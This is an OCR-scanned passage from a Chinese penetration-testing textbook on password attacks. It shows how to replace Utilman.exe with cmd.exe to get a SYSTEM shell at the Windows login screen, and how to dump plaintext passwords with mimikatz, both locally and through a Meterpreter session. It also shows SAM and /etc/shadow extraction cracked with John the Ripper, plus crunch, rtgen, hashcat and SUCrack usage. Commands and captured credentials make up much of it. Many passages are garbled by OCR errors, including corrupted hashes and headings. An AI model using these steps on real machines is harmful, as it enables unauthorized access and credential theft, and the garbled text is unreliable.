图 8.10 System32 目录 中 的 内 容 


(5) 在 该 文件 夹 中 找到 Utilman.exe 文件 ， 将 该 文件 重 命名 为 Utilman.old。 然 后 复制 
cmd.exe 文件 ， 并 将 其 文件 名 修改 为 Utilman.exe. 


(6) 现在 关闭 Kali Linux, 并 启动 Windows 系统 。 在 登录 界面 按 下 Windows+u 组 合 键 ， 
将 显示 如 图 8.11 所 示 的 界面 。 


x a 
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图 8.11 Windows 登录 界面 


CI) 从 该 界面 可 以 看 到 打开 一 个 命令 提示 符 窗口 。 在 该 窗口 中 ， 可 以 执行 一 些 DOS 
命令 。 例 如 ， 使 用 whoami 命令 得 看 用 户 信 息 ， 将 显示 如 图 8.12 所 示 的 界面 。 


图 8.12 用户 权限 信息 


(8) 从 输出 的 界面 可 以 看 到 ， 当 前 用 户 拥 有 最 高 的 权限 。 此 时 ， 就 可 以 进行 任何 的 
操作 。 

学 习 了 绕 过 Utilman 登录 后 ， 可 以 使 用 mimikatz 工具 恢复 目标 系统 锁定 状态 时 用 户 的 
密码 。 下 面 将 介绍 使 用 mimikatz 工具 ， 从 锁定 状态 恢复 密码 。 

在 操作 之 前 需要 做 一 些 准备 工作 。 首 先 从 http://blog.gentilkiwi.com/mimikatz 网 站 下 载 
mimikatz 工具 ， 其 软件 包 名 为 mimikatz trunk.zip。 然 后 将 该 软件 包 解压 ， 并 保存 到 一 个 
USB 磁盘 中 。 本 例 中 ， 将 解压 的 文件 保存 到 优盘 的 mimikatz 目录 中 。 


+235" 


第 3 篇 ”各 种 渗透 测试 
(1 六 在 系统 中 安装 Utilman Bypass， 以 便 能 执行 一 些 命令 。 
T E, 


(2) 在 锁定 果 面 的 Windows 5 rfi F Windows-u 组 如 图 8.13 Pras. 
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(4 六 进入 到 USB 磁盘 中 ， 并 和 谷 看 磁盘 中 的 内 容 。 本 例 中 的 USB 磁盘 号 F: ， 执 行 命 
令 如 下 所 示 : 


C:\Windows\system32> F: 

F:\>dir mimikatz 

2014/05/26 03:45 4,311 README.md 
2014/06/15 04:54 Win32 

2014/06/15 04:54 x64 


从 输出 的 信息 中 ， 可 以 看 到 mimikatz 目录 中 有 三 个 文件 。 其 中 Win32 和 x64 表示 
mimikatz 的 两 个 版 本 。 根 据 目 己 的 系统 架构 选择 相应 的 版 本 ， 本 例 中 的 操作 系统 是 32 位 ， 


所 以 选择 使 用 Win32。 
(5) EF Win32 目录 中 的 内 容 : 
F:\>cd mimikatz 
F:\Mimikatz>cd win32 
F:\Mimikatz\Win32>dir 
2014/06/15 04:54 29,056 mimidrv.sys 
2014/06/15 04:54 189,936 mimikatz.exe 
2014/06/15 04:54 27,632 mimilib.dll 
从 输出 的 信息 中 ， 可 以 看 到 Win32 目录 中 有 三 个 文件 。 其 中 ，mimikatz 是 一 个 可 执行 
MHF 
(6) 运行 mimikatz 程序 。 执 行 命令 如 下 所 示 : 
F:\Mimikatz\Win32>mimikatz 
HHHH.  mimikatz 2.0 alpha (x86) release "Kiwi en C" (Jun 14 2014 22:54:04) 
3HE ^ THE. 
TRÁMBE [x 
##\/## Benjamin DELPY 'gentilkiwi! ( benjamin@gentilkiwi.com ) 
4HtviH?  — http'//blog.gentilkiwi.com/mimikatz (oe.eo) 
“AHH with 14 modules * * */ 
mimikatz # 


输出 信息 显示 了 mimikatz 的 一 些 相关 信息 ， 其 中 mimikatz # 提 示 符 表示 成 功 登 录 到 了 
mimikatz 程序 。 

CI) 恢复 密码 。 执 行 命令 如 下 所 示 : 

mimikatz # sekurlsa::logonPasswords 

或 : 

mimikatz # sekurlsa::logonPasswords full 

将 输出 如 下 所 示 的 信息 : 

Authentication Id : 0 ; 10201252 (00000000:009ba8a4) 


Session : Interactive from 1 

User Name : lyw 

Domain : Windows/Test 

SID : S-1-5-21-2306344666-604645106-2825843324-1001 
msv : 
[00010000] CredentialKeys 
* NTLM : 32ed8/bdb5fdc5e9cba88547376818d4 
* SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f 
[00000003] Primary 
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* Username : lyw 
* Domain : Windows7Test 


* NTLM : 32ed87/bdb5fdc5e9cba88547376818d4 

* SHA1 : 6ed5833cf35286ebf8662b/b5949f0d 742bbec3f 
tspkg : 
wdigest : 


* Username : lyw 
* Domain : Windows/Test 
* Password : 123456 
kerberos : 
* Username : lyw 
* Domain : Windows/Test 
* Password : (null) 
ssp : 
credman : 


从 以 上 输出 信息 中 , 可 以 看 到 锁定 用 户 的 所 有 信息 。 如 用 户 名 、 各 种 加 密 的 HASH fH. 
域名 和 密码 等 。 


8.5 破解 纯 文 本 密码 工具 mimikatz 


mimikatz 是 一 款 强大 的 系统 密码 破解 获取 工具 。 该 工具 有 段 时 间 是 作为 一 个 独立 程序 
运行 。 现 在 已 被 添加 到 Metasploit 框架 中 ， 并 作为 一 个 可 加 载 的 Meterpreter 模块 。 当 成 功 
的 获取 到 一 个 远程 会 话 时 ， 使 用 mimikatz 工具 可 以 很 快 的 恢复 密码 。 本 节 将 介绍 使 用 
mimikatz 工具 恢复 密码 。 

【实例 8-3】 演示 使 用 mimikatz 恢复 纯 文 本 密码 。 有 具体 操作 步骤 如 下 所 示 。 

(1) 通过 在 目标 主机 〈Windows 7) 38/47 Veil 创建 的 可 执行 文件 backup.exe， 获 取 


msf exploit(handler) > exploit 
[*] Started reverse handler on 192.168.6.103:4444 


[*] Starting the payload handler... 
[*] Sending stage (769536 bytes) to 192.168.6.110 
[*] Meterpreter session 2 opened (192.168.6.103:4444 -> 192.168.6.110:1523) at 2014-07-19 


16:54:18 +0800 
meterpreter > 


从 输出 的 信息 中 ， 可 以 看 到 获取 到 了 一 个 与 192.168.6.110 主机 的 远程 会 话 。 
(2) 确认 目标 用 户 的 权限 。 执 行 命令 如 下 所 示 : 


meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM 


从 输出 信息 中 ， 可 以 看 到 当前 用 户 已 经 是 系统 权限 。 此 时 ， 就 可 以 进行 其 他 操作 了 。 
(3) 加 载 mimikatz 模块 。 执 行 命令 如 下 所 示 : 


meterpreter > load mimikatz 
Loading extension mimikatz...success. 


从 输出 的 信息 中 ， 可 以 看 到 mimikatz 模块 已 加 载 成 功 。 
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(4) fr mimikatz 模块 下 有 效 的 命令 。 执 行 命 令 如 下 所 示 : 


meterpreter > help 


执行 以 上 命令 后 ， 会 输出 大 量 的 信息 。 其 中 ， 在 Meterpreter 中 所 有 的 命令 都 已 分 类 。 


这 里 主要 介绍 下 mimikatz 相关 的 命令 ， 如 下 所 示 : 


Mimikatz Commands 


Command Description 

kerberos Attempt to retrieve kerberos creds 
livessp Attempt to retrieve livessp creds 
mimikatz command Run a custom commannd 

msv Attempt to retrieve msv creds (hashes) 
ssp Attempt to retrieve ssp creds 

tspkg Attempt to retrieve tspkg creds 
wdigest Attempt to retrieve wdigest creds 


以 上 输出 信息 显示 了 可 执行 的 Mimikatz 命令 。 如 回复 kerberos 信息 、livessp 信息 和 哈 
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meterpreter > msv 
[+] Running as SYSTEM 
[*] Retrieving msv credentials 


msv credentials 


AuthlD Package Domain User Password 
0;287555 NTLM WIN-RKPKQFBLG6C bob 

Im{ cd4f4cd1ca451e41aad3b435b51404ee }, ntlm( 3ed1ce151e74d17cee66bf 
6c3eed4625 } 
0;287509 NTLM WIN-RKPKQFBLG6C bob 


Im{ cd4f4cd1ca451e41aad3b435b51404ee }, ntlm( 3ed1ce151e74d1 /cee66b 
f6c3eed4625 } 


0;996 Negotiate WORKGROUP -RKPKQFBLG6C$ n.s. (Credentials KO) 
0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO) 
0;45372 NTLM n.s. (Credentials KO) 
0;999 NTLM WORKGROUP WIN-RKPKQFBLG6C$ n.s. (Credentials KO) 


执行 以 上 命令 后 ， 输 出 五 列 信息 。 分 别 表示 认证 ID. A. RE, AS. MZ 


界面 可 以 看 到 ， 当 前 系统 中 bob 用 户 的 哈 希 密码 值 中 。 在 哈 希 密码 值 中 ， 前 面 的 Im 表示 
使 用 LM 方式 加 密 ; ntlm 表示 使 用 NTLM 方式 加 密 。 


【实例 8-5] 获取 kerberos (网络 认证 协议 ) 信息 。 执 行 命令 如 下 所 示 : 


meterpreter > kerberos 
[+] Running as SYSTEM 
[*] Retrieving kerberos credentials 


kerberos credentials 


AuthID Package Domain User Password 
0;999 NTLM WORKGROUP WIN-RKPKQFBLG6C$ 

0;45372 NTLM 

0;997 Negotiate NT AUTHORITY LOCAL SERVICE 

0;996 Negotiate WORKGROUP WIN-RKPKQFBLG6C$ 
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0;287509 NTLM WIN-RKPKQFBLG6C bob www.123 
0;287555 NTLM WIN-RKPKQFBLG6C bob www.123 


从 输出 的 信息 中 可 以 看 到 ， 输 出 的 信息 类 似 my 命令 输出 的 信息 。 唯 一 不 同 的 就 是 ， 
这 里 可 以 看 到 使 用 哈 希 加 密 的 原始 密码 。 从 以 上 信息 中 ， 可 以 看 到 bob 用 户 的 密码 为 
www.123. 


【实例 8-6] 获取 wdigest 〈 摘 要 式 喘 份 验证 ) 信息 ， 如 下 所 示 : 


meterpreter > wdigest 
[+] Running as SYSTEM 
[*] Retrieving wdigest credentials 


wdigest credentials 


AuthlD Package Domain User Password 
0;999 NTLM WORKGROUP WIN-RKPKQFBLG6C$ 
0;45372 NTLM 

0;997 Negotiate NT AUTHORITY LOCAL SERVICE 

0;996 Negotiate WORKGROUP WIN-RKPKQFBLG6C$ 
0;287509 NTLM WIN-RKPKQFBLG6C bob www. 123 
0;287555 NTLM WIN-RKPKQFBLG6C bob www.123 


以 上 输出 的 信息 就 是 当前 用 户 摘 要 式 映 份 验证 的 信息 。 
【实例 8-7】 恢复 livessp 身份 验证 信息 。 执 行 命令 如 下 所 示 : 


meterpreter > livessp 
[+] Running as SYSTEM 
[*] Retrieving livessp credentials 


livessp credentials 


AuthlD Package Domain User Password 
0;287555 NTLM WIN-RKPKQFBLG6C bob n.a. (livessp KO) 
0;287509 NTLM WIN-RKPKQFBLG6C bob n.a. (livessp KO) 
0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.a. (livessp KO) 
0;996 Negotiate WORKGROUP WIN-RKPKQFBLG6C$ n.a. (livessp KO) 
0;45372 NTLM n.a. (livessp KO) 
0;999 NTLM WORKGROUP WIN-RKPKQFBLG6C$ n.a. (livessp KO) 
meterpreter > 


以 上 输出 的 信息 显示 了 当前 用 户 livessp FWE Ae 
8.6” 玻 解 操 作 系 统 用 户 密 码 


当 瑟 记 操 作 系统 的 密码 或 者 攻击 茶 台 主机 时 ， 需 要 知道 该 系统 中 茶 个 用 户 的 用 户 名 和 
密码 。 本 市 将 分 别 介 绍 破解 Windows 和 Linux HP 5. 


8.6.1 破解 Windows 用 户 密 码 


Windows 系统 的 用 户 名 和 密码 保存 在 SAM (安全 账号 管理 器 ) 文件 中 。 在 基于 NT 内 
核 的 Windows 系统 中 ， 包 括 Windows 2000 及 后 续 版 本 ， 这 个 文件 保存 在 “C:\Windows\ 
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System32\Config” 目 录 下 。 出 于 安全 原因 ， 微 软 特定 添加 了 一 些 额外 的 安全 措施 将 该 文件 
保护 了 起 来 。 首 先 ， 操 作 系 统 局 动 之 后 ，SAM 文件 将 同时 被 锁定 。 这 意味 看 操作 系统 运行 
之 时 , 用 户 无 法 打开 或 复制 SAM 文件 。 除了 锁定 ,整个 SAM 文件 还 经 过 加 密 ， 且 不 可 见 。 

拉 运 的 是 ， 现 在 有 办 法 绕 过 这 些 限制 。 在 远程 计算 机 上 ， 只 要 上 日 标 处 于 运行 状态 ， 奈 
可 以 利用 Meterpreter 和 SAM Juicer 获取 计算 机 上 的 散 列 文件 。 获 得 访问 系统 的 物理 权限 
之 后 ， 用 户 就 可 以 在 其 上 局 动 其 他 的 操作 系统 ， 如 在 USB 或 DVD-ROM 设备 上 的 Kali 
Linux。 启 动 目 标 计 算 机 进入 到 其 他 的 操作 系统 之 后 ,用 户 可 以 使 用 Kali 中 的 John the Ripper 
工具 来 破解 该 Windows 用 户 密码 。 

使 用 John the Ripper 工具 破解 Windows 用 户 密码 。 有 具体 操作 步骤 如 下 所 示 。 

C1) 检查 当前 系统 中 的 便 盘 驱动 。 执 行 命令 如 下 所 示 : 


root@kali:~# fdisk -| 

Disk /dev/sda: 42.9 GB, 42949672960 bytes 

255 heads, 63 sectors/track, 5221 cylinders, total 83886080 sectors 
Units = sectors of 1 * 512 = 512 bytes 


Sector size (logical/physical): 512 bytes / 512 bytes 
I/O size (minimum/optimal): 512 bytes / 512 bytes 
Disk identifier: Oxcfc6cfc6 
Device Boot Start End Blocks Id System 
/dev/sda1  * 63 83859299 41929618* 7 HPFS/NTFS/exFAT 


fan tH EI A ez 2A B AS A MER. IPF RA TK. VAX TERES IE NTFS, 
也 是 Windows ZH PT FF T) OA HE o 
(2) 挂 载 便 盘 驱 动 。 执 行 命令 如 下 所 示 : 


root@kali:~# mkdir /sda1 # 创 建 挂 载 点 
root@kali:~# mount /dev/sda1 /sda1/ # 挂 载 /dev/sda1 分 区 


执行 以 上 命令 后 ， 没 有 任何 输出 信息 。 
(3) 切换 目录 ， 进 入 到 Windows SAM 文件 的 位 置 。 执 行 命令 如 下 所 示 : 
root@kali:~# cd /sda1/WINDOWS/system32/config/ 


在 该 目录 中 ， 可 以 看 到 SAM 文件。 
(4) 使 用 SamDump2 提取 SAM 文件 。 执 行 命令 如 下 所 示 : 


root@kali:/sda1/WINDOWS/system32/config# samdump2 SAM system > /root/hash.txt 
samdump2 1.1.1 by Objectif Securite 

http://www.objectif-securite.ch 

original author: ncuomo@studenti.unina.it 

Root Key : SAM 


从 输出 信息 中 可 以 看 到 提取 了 SAM 文件 。 将 该 文件 的 内 容重 定 癌 到 了 /root/hash.txt X 
Tt 
(5) 运行 john 命令， 实现 密码 攻击 。 执 行 命令 如 下 所 示 : 


root@kali:/sda1/WINDOWS/system32/config# /usr/sbin/john /root/hash.txt --format=nt 
Created directory: /root/.john 
Loaded 6 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32]) 
(Guest) 
guesses: 4 time: 0:00:03:13 0.09% (3) (ETA: Mon May 12 06:46:42 2014) c/s: 152605K 
trying: 2KRIN.P - 2KRIDY8 
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guesses: 4 time: 0:00:04:26 0.13% (3) (ETA: Mon May 12 04:02:53 2014) c/s: 152912K 
trying: GROKUHI - GROKDN1 

guesses: 4 time: 0:00:04:27 0.13% (3) (ETA: Mon May 12 04:15:42 2014) c/s: 152924K 
trying: HKCUUHT - HKCUGDS 


8.62 破解 Linux 用 户 密码 


破解 Linux 的 密码 基本 上 和 破解 Windows 密码 的 方法 非常 类 似 , 在 该 过 程 中 只 有 一 点 
不 同 。Linux 系统 没有 使 用 SAM OCTESCOR DAE RA). Linux 系统 将 加 密 的 密码 敌 列 包 
含 在 一 个 叫做 shadow 的 文件 里 ， 该 文件 的 绝对 路 径 为 /etc/shadow。 

不 过 ， 在 使 用 John the Ripper 破解 /etc/shadow 文件 之 前 ， 还 需要 /etc/passwd 文件 。 这 
和 提取 Windows 密码 散 列 需要 system 文件 和 SAM 文件 是 一 样 的 道理 。John the Ripper H 
市 了 一 个 功能 ， 它 可 以 将 shadow 和 passwd 文件 结合 在 一 起 ， 这 样 就 可 以 使 用 该 工具 破解 
Linux 系统 的 用 户 密 码 。 本 小 节 将 介绍 破解 Linux 用 户 密码 的 方法 。 

使 用 John the Ripper 工具 破解 Linux 用 户 密码 。 有 具体 操作 步骤 如 下 所 示 。 

(1) 使 用 unshadow 提取 密码 散 列 。 执 行 命令 如 下 所 示 : 


root@kali:~# unshadow /etc/passwd /etc/shadow > /tmp/linux_hashes.txt 


执行 以 上 命令 后 ， 会 将 /etc/passwd/ 文 件 与 /etc/shadow/ 文 件 结合 在 一 起 ， 生 成 一 个 叫做 
linux_hashes.txt 的 文件 ， 保 存在 /tmp/ 目 录 中 。 
(2) 破解 Linux 用 户 密 人 码 。 执 行 命令 如 下 所 示 : 


root@kali:~# john --format=crypt --show /tmp/linux_hashes.txt 
root: 123456:0:0:root:/root:/bin/bash 

bob:123456: 1000: 1001 ::/nhome/bob:/bin/sh 

alice: 123456: 1001:1002::/home/alice:/bin/sh 

3 password hashes cracked, 0 left 


从 输出 的 结果 中 ， 可 以 看 到 当前 系统 中 共有 三 个 用 户 ， 其 密码 都 为 123456. 


DE. 使 用 John the Ripper 开始 破解 Linux 密码 之 前 ， 需 要 使 用 支持 破解 不 同类 型 密码 
散 列 的 John the Ripper 版 本 。 如 果 用 错 版 本 或 者 使 用 未 打 补 丁 的 John the Ripper， 
程序 将 返回 错误 信息 No password hashes loaded (没有 价值 密码 散 列 ) 。 大 多 数 
现代 Linux 系统 都 使 用 SHA 散 列 加 密 算法 保存 密码 。 


8.7 创建 密码 字典 


所 谓 的 密码 字典 主要 是 配合 密码 破解 软件 所 使 用 ， 密 码 字 典 里 包括 许多 人 们 习惯 性 设 
置 的 密码 。 这 样 可 以 提高 密码 破解 软件 的 密码 破解 成 功率 和 命中 率 , 缩短 密码 破解 的 时 间 。 
当然 ， 如 果 一 个 人 密码 设置 没有 规律 或 很 复杂 ， 示 包含 在 密码 字典 里 ， 这 个 字典 就 没有 用 
了 ， 甚 至 会 延长 密码 破解 所 需要 的 时 间 。 在 Linux 中 有 Crunch 和 rtgen 两 个 工具 ， 可 以 来 
创建 密码 字典 。 为 方便 用 户 的 使 用 ， 本 市 将 介绍 这 两 个 工具 的 使 用 方法 。 
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8.7.1 Crunch 工具 


Crunch PPA E iG HT, AS a HTE. EH] Crunch 工具 生成 
的 密码 可 以 发 送 到 终端 、 文 件 或 另 一 个 程序 。 下 面 将 介绍 使 用 Crunch 工具 创建 密码 字典 。 

使 用 Crunch 生成 字典 。 具 体操 作 步 骤 如 下 所 示 。 

(1) 启动 crunch 命令 。 执 行 命令 如 下 所 示 。 


root@kali:~# crunch 


执行 以 上 命令 后 ， 将 输出 如 下 所 示 的 信息 : 


crunch version 3.4 

Crunch can create a wordlist based on criteria you specify. The outout from crunch can be sent 
to the screen, file, or to another program. 

Usage: crunch <min> <max> [options] 

where min and max are numbers 

Please refer to the man page for instructions and examples on how to use crunch. 


输出 的 信息 显示 了 crunch 命令 的 版 本 及 语法 格式 。 其 中 , 使 用 crunch 命令 生成 密码 的 


crunch [minimum length] [maximum length] [character set] [options] 


crunch MA 75 HMU P Ata. 

Q -o: 用 于 指定 输出 字典 文件 的 位 置 。 

O -b: 指定 写 入 文件 最 大 的 字 市 数 。 该 大 小 可 以 指定 KB、MB 或 GB, 但 是 必须 与 -o 

START 选项 一 起 使 用 。 

O -t: 设置 使 用 的 特殊 格式 。 

O -1: 该 选项 用 于 当 -t 选项 指定 @、% 或 ^ 时 ， 用 来 识别 占 位 符 的 一 些 字符 。 

(2) 创建 一 个 密码 列表 文件 ， 并 保存 在 果 面 上 。 其 中 ， 生 成 密码 列表 的 最 小 长 度 为 8， 
最 大 长 度 为 10， 并 使 用 ABCDEFGabcdefg0123456789 为 字符 集 。 执 行 命令 如 下 所 示 : 


root@kali:~# crunch 8 10 ABCDEF Gabcdefg0123456789 —o /root/Desktop/ 
generatedCrunch.txt 

Notice: Detected unicode characters. If you are piping crunch output 

to another program such as john or aircrack please make sure that program 
can handle unicode input. 

Do you want to continue? [Y/n] y 

Crunch will now generate the following amount of data: 724845943848960 bytes 
691266960 MB 

675065 GB 

659 TB 

0 PB 

Crunch will now generate the following number of lines: 661552638197 76 
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AAdb6gFe 

AAdb6gFf 

AAdb6gFg 

AAdb6gF0 

AAdb6gF1 

AAdb6gF2 

AAdb6gF3 

AAdb6gF4 

AAdb6gF5 

从 以 上 输出 的 信息 中 ,可 以 看 到 将 生成 659TB 大 的 文件 ， 总 共有 66155263819776 íF. 
以 上 命令 执行 完成 后 ， 将 在 果 面 上 生成 一 个 名 为 generatedCrunch.txt 的 字典 文件 。 由 于 组 
合生 成 的 密码 较 多 ， 所 以 需要 很 长 的 时 间 。 


(3) 以 上 密码 字典 文件 生成 后 ， 使 用 Nano 命令 打开 。 执 行 命令 如 下 所 示 : 
root@kali:~# nano /root/Desktop/generatedCrunch.txt 


执行 以 上 命令 后 ， 将 会 打开 generatedCrunch.txt 文件 。 访 文件 中 保存 了 使 用 crunch 命 
令 生 成 的 所 有 密码 。 


8.7.2 rtgen 工具 


rtgen 工具 用 来 生成 彩虹 表 。 彩虹 表 是 一 个 庞大 的 和 针对 各 种 可 能 的 字母 组 合 预先 计算 
好 的 哈 希 值 的 集合 。 彩 虹 表 不 一 定 是 针对 MDS 算法 的 ， 各 种 算法 都 有 ， 有 了 它 可 以 快速 
的 破解 各 类 密码 。 越 是 复杂 的 密码 ， 需 要 的 彩虹 表 就 越 大 ， 现 在 主流 的 彩虹 表 都 是 100G 
BE E. 

使 用 rtgen 工具 生成 彩虹 表 。 上 具体 操作 步 骤 如 下 所 示 : 

(1) 切换 到 rtgen 目录 。 执 行 命 令 如 下 所 示 。 


root@kali:~# cd /usr/share/rainbowcrack/ 


(2) 使 用 rtgen 命令 生成 一 个 基于 MDS 的 彩虹 表 。 执 行 命令 如 下 所 示 : 


root@kali:/usr/share/rainbowcrack# ./rtgen md5 loweralpha-numeric 1 5 0 3800 33554432 0 
rainbow table md5_loweralpha-numeric#1-5 0 3800x33554432 0.rt parameters 


hash algorithm: md5 

hash length: 16 

charset: abcdefghijklmnopqrstuvwxyz0 123456789 

charset in hex: 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 
T3 74 T5 T6 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 

charset length: 36 

plaintext length range: 1 - 5 

reduce offset: 0x00000000 

plaintext total: 62193780 

sequential starting point begin from 0 (0x0000000000000000) 

generating... 


131072 of 33554432 rainbow chains generated (0 m 42.5 s) 
262144 of 33554432 rainbow chains generated (0 m 39.2 s) 
393216 of 33554432 rainbow chains generated (0 m 41.6 s) 
524288 of 33554432 rainbow chains generated (0 m 42.0 s) 
655360 of 33554432 rainbow chains generated (0 m 39.1 s) 
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786432 of 33554432 rainbow chains generated (0 m 40.1 s) 
917504 of 33554432 rainbow chains generated (0 m 39.9 s) 
1048576 of 33554432 rainbow chains generated (0 m 38.8 s) 
1179648 of 33554432 rainbow chains generated (0 m 39.2 s) 
1310720 of 33554432 rainbow chains generated (0 m 38.2 s) 
33161216 of 33554432 rainbow chains generated (0 m 40.2 s) 
33292288 of 33554432 rainbow chains generated (0 m 38.9 s) 
33423360 of 33554432 rainbow chains generated (0 m 38.1 s) 
33554432 of 33554432 rainbow chains generated (0 m 39.1 s) 


以 上 信息 显示 了 彩虹 表 的 参数 及 生成 过 程 。 例 如 ， 生 成 的 彩虹 表 文 件 名 为 
md5_loweralpha-numeric#1-5 0 3800x33554432 0.rt; 该 表 使 用 MDS 散 列 算法 加 密 的 ; 使 
用 的 字符 集 abcdefghijkImnopqrstuvwxyz0123456789 等 。 

(3) 为 了 容易 使 用 生成 的 彩虹 表 ， 使 用 rtsort 命令 对 该 表 进 行 排序 。 执 行 命令 如 下 
PEE 

root@kali:/usr/share/rainbowcrack# rtsort md5 loweralpha-numeric£1-5 0_ 

3800x33554432 O.rt 

md5 loweralpha-numeric£1-5 0 3800x33554432 0.rt: 

1351471104 bytes memory available 

loading rainbow table... 


sorting rainbow table by end point... 
writing sorted rainbow table... 


输出 以 上 信息 表示 生成 的 彩虹 表 已 成 功 进 行 排序 。 


8.8 ”使 用 NVIDIA 计算 机 统一 设备 架构 (CUDA) 


CUDA (Compute Unified Device Architecture) 是 一 种 由 NVIDIA 推出 的 通用 并 行 计算 
ERJ, ARRE GPU 能 够 解决 复杂 的 计算 问题 。 它 包含 了 CUDA 指令 集 架 构 CISA) 及 
GPU 内 部 的 并 行 计 算 引 擎 。 用 户 可 以 使 用 NVIDIA CUDA 攻击 使 用 哈欠 算法 加 密 的 密码 ， 
这 样 可 以 提 融 处 理 的 速度 。 本 市 将 介绍 使 用 OclHashcat 工具 攻击 密码 。 

使 用 OclHashcat 工具 之 前 ， 一 定 要 确定 当前 系统 已 正确 安装 了 了 NVIDIA 显卡 驱动 。 在 
Kali 中 ，OclHashcat 默认 安装 在 /usr/share/oclhashcat 目录 中 。 所 以 需要 先 切换 目录 到 
OclHashcat, Hi/HzJj OclHashcat 工具 。 执 行 命令 如 下 所 示 : 


root@kali:~# cd /usr/share/oclhashcat 
root@kali:/usr/share/oclhashcat # Is 


charsets cudaExample500.sh eula.accepted example500.hash hashcat.hcstat masks 
oclExample500.sh 
cudaExampleO.sh | cudaHashcat.bin exampleO.hash example.dict 
hashcat.pot oclExampleO.sh oclHashcat.bin 
cudaExample400.sh docs example400.hash extra kernels  oclExample400.sh 
rules 


以 上 输出 结果 显示 了 OclHashcat 目录 下 所 有 的 文件 。 其 中 ，cudaHashcatbin are ^ 
件 是 用 于 破解 密码 文件 的 。 在 使 用 该 可 执行 文件 之 前 ， 先 查看 下 它 的 帮助 文档 。 执 行 命令 
如 下 所 示 : 


root@kali:/usr/share/oclhashcat# ./cudaHashcat.bin --help 
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cudaHashcat, advanced password recovery 
Usage: cudaHashcat [options]... hash|hashfile|hccapfile [dictionary|mask| 


directory]... 


* General: 
-m, --hash-type- NUM 
-a, --attack-mode-NUM 
-V, --version 
-h, --help 
--eula 
--quiet 
* Benchmark: 
-b, --benchmark 
--benchmark-mode=NUM 
* Misc: 
--hex-salt 
--hex-charset 
--force 
--Status 
--Status-timer=NUM 


* Benchmark Settings: 
0 = Manual Tuning 


Hash-type, see references below 
Attack-mode, see references below 
Print version 

Print help 

Print EULA 

Suppress output 


Run benchmark 
Benchmark-mode, see references below 


Assume salt is given in hex 

Assume charset is given in hex 

Ignore warnings 

Enable automatic update of the status-screen 
Seconds between status-screen update 


1 = Performance Tuning, default 


* Outfile Formats: 
1 = hash[:salt] 


2 = plain 
3 = hash[:salt]:plain 
4 = hex_plain 


5 = hash[:salt]:hex_plain 
6 = plain:hex_plain 


7 = hash[salt]:plain:hex plain 


* Built-in charsets: 


?| = abcdefghijklmnopqrstuvwxyz 


?u - ABCDEFGHIJKLMNOPQRSTUVWXYZ 


?d = 0123456789 
?a = ?|?u?d?s 


?s = M"H$968& ()**,- /<=>?@N^ 人 ~ 
* Attack modes: 
0 = Straight 


1 = Combination 

3 = Brute-force 

6 = Hybrid dict + mask 
7 = Hybrid mask + dict 


* Specific hash types: 
11 = Joomla 


21 = osCommerce, xt:Commerce 


101 = nsldap, SHA-1(Base64), Netscape LDAP SHA 
111 = nsldaps, SSHA-1(Base64), Netscape LDAP SSHA 


112 = Oracle 11g 

121 = SMF > v1.1 

122 = OSX v10.4, v10.5, v10.6 
131 = MSSQL(2000) 
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132 = MSSQL(2005) 
141 = EPiServer 6.x < v4 
1441 = EPiServer 6.x > v4 
1711 = SSHA-512(Base64), LDAP {SSHA512} 
1722 = OSX v10.7 
1731 = MSSQL(2012) 
2611 = vBulletin < v3.8.5 
2711 = vBulletin > v3.8.5 
2811 = IPB2+, MyBB1.2+ 
62XY = TrueCrypt 5.0+ 
X -1-PBKDF2-HMAC-RipeMD 160 
X -2- PBKDF2-HMAC-SHA512 


X -3- PBKDF2-HMAC-Whirlpool 

X =4= PBKDF2-HMAC-RipeMD 160 boot-mode 
Y=1=XTS AES 
Y = 2 = XTS Serpent --- unfinished 
Y = 3 = XTS Twofish --- unfinished 
Y = 4 = XTS AES-Twofish --- unfinished 
Y = 5 = XTS AES-Twofish-Serpent --- unfinished 
Y = 6 = XTS Serpent-AES --- unfinished 
Y = 7 = XTS Serpent-Twofish-AES  --- unfinished 
Y = 8 = XTS Twofish-Serpent --- unfinished 


输出 的 信息 显示 了 cudaHashcat.bin 命令 的 语法 格式 、 可 用 选项 及 配置 例子 等 。 
J fi cudaHashcat 命令 的 语法 及 选项 后 ， 就 可 以 指定 要 破解 的 密码 文件 了 。 执 行 命 令 
如 下 所 示 : 


root@kali:~# ./cudaHashcat.bin attackfile -1 ?Il?u?d?s 71712171 71712171 


下 面 对 以 上 命令 中 的 各 参数 将 分 别 进行 介绍 ， 如 下 所 示 。 

O /cudaHashcat.bin: 表示 调用 cudaHashcat 命令 。 

口 attackfile: 指 的 是 攻击 的 文件 。 

QC) -1 212u?d?: 表示 指定 的 一 个 自 定义 字符 集 。 该 选项 指定 的 字符 集 可 以 是 小 写字 母 、 
大 写字 母 和 数字 。 

Q ?1?1?1?1: 表示 使 用 字符 集 唯一 的 左 掩 人 码 。 

Q 271917191: 表示 使 用 字符 集 唯一 的 右 掩 码 。 


89 ”物理 访问 攻击 


物理 访问 攻击 与 提升 用 户 的 权限 类 似 。 即 当 一 个 普通 用 户 登 录 到 系统 中 ， 破 解 本 地 其 
他 用 户 账户 的 密码 。 在 Linux 中 ， 普 通用 户 可 以 通过 su 命令 代 符 其 他 用 户 执行 某 些 操作 ， 
意味 看 该 用 户 能 够 在 Linux/Unix 系统 中 提升 目 己 的 权限 。 在 这 种 情况 下 ,可 以 使 用 SUCrack 
TART RE su 的 本 地 用 户 账 户 的 密码 , 来 完成 后 续 的 渗透 攻击 操作 。 本 节 将 介绍 使 
用 SUCrack 工具 攻击 该 用 户 。 

SUCrack 是 一 个 多 线程 工具 ， 人 允许 用 户 暴 力 攻 击 使 用 su 的 本 地 用 户 账户 的 密码 。 该 工 
有 具 和 弟 用 的 几 个 选项 如 下 所 示 。 

口 qe fr SUCrack 的 帮助 文件 。 

: 修改 妾 试 攻击 登录 的 用 户 。 
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-: 设置 显示 统计 的 间 隅 时 间 。 默 认 时 间 是 3 秒 。 
-a: 允许 用 户 设 置 是 否 使 用 ANSI £c X5. 
-w: 是 在 SUCrack 能 够 利用 的 线程 数 。 因 为 SUCrack 是 多 线程 的 ， 用 户 可 以 指定 
